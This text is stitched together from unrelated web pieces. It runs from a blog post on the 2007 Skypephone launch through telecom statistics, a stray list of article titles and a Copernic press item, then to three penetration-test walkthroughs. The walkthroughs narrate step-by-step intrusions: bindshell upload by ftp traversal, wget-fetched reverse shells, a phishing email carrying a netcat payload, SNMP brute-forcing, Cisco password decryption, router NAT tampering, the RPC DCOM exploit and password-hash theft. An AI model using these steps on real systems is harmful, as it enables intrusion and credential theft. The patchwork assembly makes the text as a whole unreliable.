I remember thinking, when I first started using Skype back in 2004, that here’s a small, nimble company that will drive a massive wedge into traditional telephone service business models.

From a user perspective, the model is dead simple and highly compelling – free phone calls via your computer to other users of the service, and very low cost calls via your computer to ‘normal’ telephone numbers, literally anywhere on the planet.

Skype (and its later competitors) has changed the way millions of people around the world communicate where prohibitive costs of using a phone service are no longer a huge barrier – a barrier erected by the big telecommunications operators.

Arguably, Skype has played a not insignificant role in the changes we’ve seen in the past few years in many countries, notably in Europe and North America, with those very same telecommunications companies, what they offer, and how they price it.

Parallel to all this are continuing advances in technology, especially the rapid growth in broadband internet penetration in many countries and changes in people’s behaviors in terms of what they want, how they want it and when they want it.

This is especially the case with the so-called digital natives, the younger generation who dictate change through their own insistent and influential behaviours.

There’s no better way at the moment to drive this point home about changing behaviours (and expectations) than The Rise of the Mobile Super User, a thought-provoking 49-page white paper written by Will Harris and available on free download from Edelman.

These reflections were going through my mind yesterday during the press launch of the Skypephone (pictured above), a joint offering from Skype and UK mobile operator 3, which I attended.

It says to me – this changes everything.

We’re moving up a big notch, from broadband tied to computers and so the geographical restrictions on the things you can do (like make and receive free phone calls), to broadband untied, on mobile devices.

Some would argue that this isn’t new – you can get net access on mobile phones already, and have been able to for some years; and, depending on the device, install and use Skype.

True, but not like this.

Not an offering from a mobile operator – one of the perceived ‘bad guys,’ if you can take that expression in positive context – that gives you a device that’s centred around Skype which simply lets you connect with people in whatever way you choose: free via Skype, as well as with any other mobile phone on a cellular network.

No, what 3 and Skype are doing with the Skypephone is driving another wedge firmly into the next generation of communication – mobile.

I can’t think of anything that would have prevented any other mobile operator – Vodafone, O2, T-Mobile, Orange… take your pick – from doing something like this other than maintaining the high pricing status quo.

Skype would be willing – in the briefing, Skype acting CEO Michael van Swaaij quipped that Vodafone can call him any time for talks.

But who in their right business mind would offer a handset and associated services that includes making and receiving calls for free via their network? A crazy notion, isn’t it?

Well, if it’s crazy, then welcome to the asylum!

It gets better when you think of business use of a product like the Skypephone.

One of the questions I asked Kevin Russell, 3’s CEO, in yesterday’s press briefing was how he saw business opportunities for the Skypephone, given that it’s being positioned right now as a consumer product.

His said if (I’d day more likely ‘when’) 3 were to target businesses, it would be the small- to medium-size business sector (which is a classic Skype business target).

But he mentioned anecdotally that his first sale of a Skypephone was to the CEO of a large company who wants to communicate with his 10,000 employees.

That’s the thin edge of a very wide wedge.

I was also interested to hear Kevin say that experiential marketing and word of mouth will play significant roles in 3’s marketing and communication of the Skypephone and engagement with users and influencers.

So don’t expect any 30-second TV spots. Instead, look for blogosphere and related online commentary.

Following the press briefing, I spoke with John Penberthy-Smith, 3’s marketing director. Our conversation included this topic.

That interview will be posted soon as an FIR Interview podcast (and I’ll add a link in this post when it is).

The Skypephone goes on sale in the UK on November 2 for £49.99 (talk about affordable) on pay-as-you-go, and free if you take out a contract.

It will roll out elsewhere in Europe and Australia in the coming weeks. There are no current plans to offer the phone in the USA.

I have not one but two Skypephones to play with for the next three months, courtesy of 3. Review to come (taster: this is one very cool gadget!).

Meanwhile, you can follow what other Skypephone players are doing with their phones at 3mobilebuzz.

Comments

Tag:

That is an increase from the current 84 percent penetration level of the U.S. population (including business, consumer and double users) who have mobile phones. Kagan projects that mobile phone subscriptions will grow about 13 percent through 2017, faster than the country’s 1 percent population growth.

"If carriers can hold onto their position in the revenue chain, data is poised to give them a second growth spurt," said Sharon Armbrust, a senior analyst at SNL Kagan.

"While subscriber units and voice revenue will inch along, we expect data revenue to grow at a compound annual 14% rate over the next 10 years, rising to at least 22% of service revenue, compared to under 10% today," she said.

SNL Kagan predicts total mobile industry average revenue per users will grow at an inflation- paced compound annual growth rate of 1.5 percent over the next 10 years, to $61.9 in 2017 from $52.38 in August 2007.

1. Veil of Darkness
2. Central Hudson Gas & Electric Corp. v. Public Service Commission
3. Group key
4. Tacca leontopetaloides
5. American Culinary Federation
6. WCTI-LP
7. Eric Marshall
8. YAF
9. Line by Line
10. Tolleson Union High School
11. Ken Kocher
12. Riskbase
13. Rae Valentine
14. Fire Prevention Week
15. Win My Soul
16. Chewy Granola Bars
17. United Nations Security Council Resolution 31
18. A Single
19. Jean Étienne Bercé
20. Isaac Fraser
21. FICA (disambiguation)
22. Lance Broadway
23. Victoriana
24. UC San Diego School of Medicine
25. Gordon
26. Whipped Cream & Other Delights
27. With This Ring
28. Spinsterhood

Comments

Tag:

Tag:

US Broadband Penetration Just Stinks

The Organisation for Economic Co-operation and Development released its broadband penetration report for December 2006. This look at 30 countries and their number of broadband subscribers looks good for parts of Europe.

For the United States, it just stinks. The US growth rate for broadband penetration now rates 20th out of the 30 countries. In per capita broadband use, the US is very average, rating in 15th place.

The paltry speeds US providers deliver to customers come at a dear price. An article by Free Press noted an advance look at another OECD report; June’s "The Communications Outlook 2007" says the world’s broadband leaders pay less than $1 per Mbps of service.

Here, our telcos and other ISPs get away with rates of around $10 per Mbps.

"We are failing to bring the benefits of broadband to all our citizens, and the consequences will resonate for generations," said Ben Scott, policy of director of Free Press. "There is no justification for America’s declining status as a global Internet leader."

The Free Press analysis of the OECD report included this nugget:

If broadband penetration were 50 percent of all U.S. homes, economists estimate that consumers would realize a $38 billion annual surplus. If household broadband penetration were at 95 percent, the consumer surplus would be $350 billion.

Let’s go back to around this time last year, where telecom analyst Bruce Kushnick assessed the 1996 Telecom Act and found that its ten year timetable called for 45 Mbps to 86 million US households as of last year. Telecoms enjoyed over $200 billion in tax breaks and other benefits from the Telecom Act.

Now there are calls for fiber to the home by 2015. Om Malik cited a call from the Fiber to the Home Council for Congress and the President to push for 100Mbps connections to the home in eight years.

Considering the influence the telecom industry has with Congress, and President Bush’s lame-duck status, we are not optimistic about seeing 100Mbps to the home by 2015, or even 3015. Telcos make a tidy profit on minuscule bandwidth, and without a revolutionary way to deliver bandwidth that bypasses them, they have no real motivation to change the status quo.

Copernic continues to outmaneuver both Microsoft and Google in the battle for desktop search supremacy, as Google Desktop Search is only available in English and Microsoft has yet to launch its new desktop search product.

CDS enables users to instantly search their personal files, emails and attachments as well as pictures, music, and videos. Copernic recently announced CDS 1.1, which allows users to experience a more refined search, thanks to performance optimizations, new customization options, user interface improvements, and better compatibility.

“We are aggressively following our strategy to accelerate market penetration through low cost international mass distribution and licensing partnerships,” said David M. Burns, Copernic CEO. “Copernic is already a strong search brand in Europe. Our goal is to quickly outperform the success of Copernic Agent, which has been downloaded by more than 15 million users across Europe. Our strategic partnerships in both Europe and Asia will solidify Copernic’s position as the clear alternative to Google and Microsoft in the desktop search market.”

“Having CDS available in key European core languages enables us to meet the needs of the leading European Internet portals and ISP’s,” said Frank Meltke, CEO of Contraco, a Copernic distribution partner for Europe and Asia. “With Korean and other Asian language versions of CDS in the pipeline, we can turn our focus to broadband markets in Korea and Japan.”

WebProNews | Breaking eBusiness News
Your source for investigative ebusiness reporting and breaking news.

This is actually a replication (lab conditions) of one of my latest penetration tests, which I enjoyed thoroughly.

I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.

1. A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 are open, suggests this machine is not firewalled, and is connected directly to the internet.

2. It looks like a Windows 2000 box (due to the versions of the WEB and SMTP server). There also seems to be a 3rd party ftp server – Flash FTP server 2.1.

3. I seem to remember seeing a recent vulnerability in flash ftp server, and a quick google search affirms my suspicions.

4. With a bit of trial and error, I find that the ftp username and password is ftp / ftp.

5. I log on to the ftp, and check where the ftp home directory lies. I attempt to upload a bindshell (srvcmd.exe) to the default location of the IIS “scripts” directory (using file traversal) , in order to be able to execute the bindshell.

6. Once that’s done, I execute srvcmd.exe by pointing my web browser to it.

7. Once executed, the bindshell opens a cmd shell at port 2323. What’s this? A dual homed machine?

8. We now have IUSR privileges on the Windows box, and the ability to ftp files to the machine using username ftp / ftp.

9. We upload out favorite toolkit to the ftp server, including a port scanner, and scan the internal network (192.168.0.0/24).

scan the internal network (192.168.0.0/24).
C:internetftpserver>sl -bhtz 192.168.0.1-254
sl -bhtz 192.168.0.1-254Scan of 254 IPs started at Thu Jan 15 19:28:45 2004
------------------------------------------------------------------------------
192.168.0.1
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456

C:internetftpserver>

10. Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual. I was running HoneyD so simulate a larger network. Identifying the real linux box (192.168.0.111 – Running mandrake 8.2) took a long time, so I’ll just cut the story short J.

11. I identify a quickly exploitable service on the mandrake machine (openssl), and upload a cygwin compiled version of the exploit (including dll’s) into the ftp directory. I execute the exploit, and get a shell on the internal mandrake box.

C:internetftpserver>dir
dir
Volume in drive C has no label.
Volume Serial Number is 20AA-0A2D

bash-2.05$ uname -a; id; w;←[K
Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root vc/1 - 2:31pm 7:23 0.41s 0.36s -bash
bash-2.05$

12. The shell I get is a bit shifty, and echo’s all my commands twice. I decide to upload a reverse bindshell onto the mandrake box, and make it connect back to my attacking machine. I do this by using wget, and retrieving the rbs.c file from www.secureit.co.il.

13. Once that’s done, I compile and execute the reverse bind shell, while netcat is listening on port 4000 on the attacking machine. This gives me a cleaner shell, with “apache” user privileges.

14. Vaguely remembering the output of the uname command (Linux box82 2.4.18-6mdk) I decide to attempt a privilege escalation attack using the Linux kernel ptrace/kmod local root exploit, which should work under several 2.2.x and 2.4.x kernels.

15. I download (wget, again) compile and execute the exploit, hoping for the best.

16. The exploit was successful, and we now have root privileges on the mandrake box. The .doc file was located in /root/C.doc.

Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP

Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.

Obviously, there was no external access to this machine from the internet, so I had to plan the attack carefully.I decided to use some social engineering skills to initiate a connection from the internal network to my attacking machine, as this was the only way to establish communications with my target.

I called up the organization, and asked to speak with the secretary working on my target computer. I told her that “I was interested in buying one of their products, and I would like to send her an email with a few questions, before I make the purchase”. She gladly complied, and disclosed her email address to me.

I crafted a special html email, with a reverse shell (netcat) payload, which would self execute, once the email was opened. A few minutes later, she received the email, opened it, thus shovelling a shell to my listening machine. Let the games begin.

Once I had the shell, I had to create some “Backup Shells” in case the connection gets severed. There’s nothing worse than losing the only single connection to a penetrated machine I did this using the “at” command, sending myself a NetCat shell every 15 minutes. I found myself smiling every 15 minutes.

Once this was done, my first instinct was to start uploading my toolkit to this machine using tftp, however it seemed that there were very restrictive firewall policies on outgoing connections in the internal network. TFTP just didn’t go through.

By echoing ftp commands into a text file, I downloaded a small toolkit to the victim machine, which included some VNC files, and a custom made registry file, which places VNC setting (such as a VNC password and a setting which allows to connect to VNC locally – more on that later).

From this point onwards, I followed the instructions from http://guh.nu to remotely install vnc, as can be summarized from these commands:

Now I had VNC installed on the remote machine, but there was no way to get to port 5900 (VNC) in order to connect to it (2 firewalls, and fascist outbound rules).

I decided to implement a UNIX scenario by which one can tunnel ports via SSH to remote machines. The SSH client I found suitable for this job was plink.exe (the putty command line client).
I installed the SSH server found in Cygwin on my attacking machine, at proceeded to tunnel port 5900 from the victim machine, to my own:

The SSH connection had been made, and from a local netstat -a on my machine, I could see that port 5900 was successfully mapped to my attacking computer.

I quickly whipped out my VNC client, and attempted to connect locally to port 5900:

To my surprise, I was welcomed with a password prompt:

And immediately after, I had a remote VNC session to the attacked machine.

I had tunneled stuff via SSH many times in Linux environments, however this was the first time I attempted to do in under Windows.

I was blown away by the Speed of the VNC session (due to the compression on the SSH channel), and by the fact that it actually worked. I thought of releasing a stray KaHt2.exe into the internal network (all in GUI, of course), however, my objectives had been achieved, and it was very late at night.

Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP

Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.

Please note that all identifying details such as IP addresses and hostnames have been changed, to protect the vulnerable and innocent.

I would like to thank my anonymous client for allowing me to write up and publish this article.

Chain of Events:

1:20 am
I sit down in front of my screen, with a fresh cup of coffee. My goal is to remotely penetrate company.com, at their request, of course. The only prior information I have, is their domain name – company.com.

1:22 am
I decide to start out with a bit of DNS enumeration, in order to identify company.com’s gateway routers / computers, and get a general idea about what kind of network they have. I use ‘nslookup’ to do this.

Gentoo Tools # nslookup

>

Nslookup suggests that company.com’s dns records are managed by their ISP, which minimizes the probability of a successful DNS zone transfer .

I attempt to identify company.com’s mail server, which ends up being “mail.company.com” (at cost 0). This suggests that company.com host their own mail server, on site.

1:30 am
I run nmap on mail.company.com, and find a variety of services running on it.

Gentoo Tools # nmap -sS mail.company.com

Gentoo Tools #

“Strange” I think to myself. “A Mail server running ‘Finger’ service?”. I run a quick UDP scan.

Gentoo Tools # nmap -sU -p 161-162 mail.company.com

Gentoo Tools #

“Hmm, SNMP is enabled…Could this be a router?”.

A quick telnet command to mail.company.com verifies my suspicions.

I immediately recognize the Cisco Telnet banner.

Gentoo Tools # nc -v mail.company.com 23

Gentoo Tools #

Apparently, mail.company.com is a router, PAT’ing ports into Internal Server(s) (Pop3, Http, Imap).

My next action is to attempt to identify the router, hoping it really is a Cisco. This can be done with SNMP – and Phillip Waytaens’ SNMPEnum would do the job perfectly. The following is a shortened output of SNMPEnum:

Gentoo snmp # perl -w snmpenum.pl 234.212.54.3 public cisco.txt

Gentoo snmp #

I use the SNMPEnum script, assuming that the SNMP public community string is “public” (As SNMP is often misconfigured). Fortunately for me, this assumption is correct – However, the “read” community string has been changed.

I whip out my favorite SNMP community string bruteforce tool (Solarwinds SNMP Dictionary attack), and start pounding at the router, with my favorite dictionary file.

After a (long) while, I see the good news I was hoping for. I finally have the read-write community string. This would probably allow me to download the router’s configuration (SNMP allows this). A quick turn with the modified “snmpbrute”, and I tftp the router configuration file straight to my attacking machine.

1:55 am
Doing the “Wild Indian rain dance”. I go to the kitchen for some more coffee.

1:58 am
I start looking at the cisco configuration file. It seems that the login and enable passwords are the same. I use a perl script to decrypt the “type 7″ cisco encryption. The password turns out to be “therouter”.

Current configuration:
!
version 12.2
no service pad
!
hostname mail.company.com
!
enable password 7 0958460C0B0A02060E1E
!
login
transport input none
stopbits 1
line vty 0 4
password 7 0958460C0B0A02060E1E
login
!
end

A deeper look into the router’s configuration file, reveals their Internal mail / web server’s internal address – 172.16.0.5.

The following is part of the Cisco configuration file that NAT’s the ports from the router, to the internal mail/web server :

!

!

2:30 am
I sip my cold coffee, and start profiling the information I have up to now. In the backround, I verify that their internal server is indeed running windows 2000.

Gentoo# nc -n 234.212.54.3 80

Gentoo#

“Their internal server is most probably running Windows 2000. What are the chances that company.com feels secure – thinking that they are protected by their router? What are the chances they havn’t patched their internal servers against some major vulnerabilities?” I decided to give it a shot.

2:38 am
My first choice is to attempt to use the rpc dcom exploit on their internal server, but in order to do this, I have to open up a few more ports on the router, and direct them to the internal mail / web server.

Router#conf t
Enter configuration commands, one per line. End with CNTL/Z.

Router(config)#ip nat inside source static tcp 172.16.0.5 10000 234.212.54.3 10000 extendable

While I’m at it, I’ll open up all Netbios ports (for later SMB enumeration), and terminal services (I’m feeling lucky). I also open port 10000, knowing i’ll need to open an extra port in order to connect my shell to the internal server.

I whip out my exploit toolkit (framework) and send the RPC Dcom exploit to the router, knowing that the exploit would be redirected to the internal server due to my recent NAT modificationson the router.

Gentoo # ./cli exp/msrpc_dcom1_overflow.exp payload=winbind rhost=mail.company.com lport=10000 OS=2K E

C:WINNTsystem32>

3:01 am
Time for more coffee. It seems that my assumption paid off, this company has NOT patched their internal servers, due to a false sense of security. I now have SYSTEM privilages on their web / mail server.
I quickly upload pwdump4.exe in order to dump the password hashes to a files, for later, local cracking.

Once the hashes are dumped to a file, I tftp this file from their internal webserver back to my attacking machine.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

Usually, I’d use ‘john the ripper’ to crack these password hashes, however, I recently finished generating rainbow-crack’s hash tables, and I thought i’de give it a try.

D:TOOLSpasswordRTGEN>rcrack.exe *.rt -f hash.txt

D:TOOLSpasswordRTGEN>

Rainbow-crack proved to be an invaluable tool, and shortened the whole process of NTLM hash cracking to less than 10 minuets. Using john the ripper, this could have taken anywhere from one week to a couple of months.

3:30 am
Once the administrator password is found, I attempt to connect to port 3389 on mail.company.com – hoping that per-chance terminal services is enabled. It seems that lady luck was is my favor – and I receive a terminal services window. Using the cracked Administrator password, I log into the the web server – Mission completed.

3:37 am
To completely consolidate my control of the client’s network, I upload a modified version of KaHT II (the RPC DCOM autohacker) and edit the macros.txt file, so that each successful exploitation would tftp the ‘repair’ sam file to my attacking machine.

At this stage, I stop my attack on the client’s network, as the contract objectives are completed.

3:57 am
I take one last sip – What would I do without my coffee?

Click here to sign up for FREE Tech. newsletters from iEntry!

Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP

Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.